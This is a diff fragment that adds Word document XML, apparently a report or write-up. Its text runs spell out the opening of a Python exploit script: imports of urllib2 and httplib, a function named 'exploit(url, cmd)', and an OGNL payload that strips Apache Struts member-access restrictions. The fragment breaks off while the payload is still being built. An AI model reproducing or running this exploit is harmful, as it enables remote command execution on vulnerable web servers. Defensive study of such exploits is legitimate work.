+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>/bin/python</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t># -*- coding: utf-8 -*-</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>urllib2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>import</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>httplib</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t> </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>def</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>exploit(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>url</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>cmd</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>):</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload =</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"%{(#_='multipart/form-data')."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>dm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>=@</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ognl.OgnlContext@DEFAULT_MEMBER_ACCESS</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>)."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#_</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>memberAccess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>?"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#_</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>memberAccess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>=#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>dm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>):"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"((#container=#context['</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>com.opensymphony</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>.xwork2.ActionContext.container'])."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#ognlUtil=#</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>container.getInstance</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(@com.opensymphony.xwork2.ognl.OgnlUtil@class))."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ognlUtil.getExcludedPackageNames</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>).clear</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>())."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>ognlUtil.getExcludedClasses</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>).clear</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>())."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>"(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>context.setMemberAccess</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>(#</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>dm</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>))))."</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>    payload +=</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
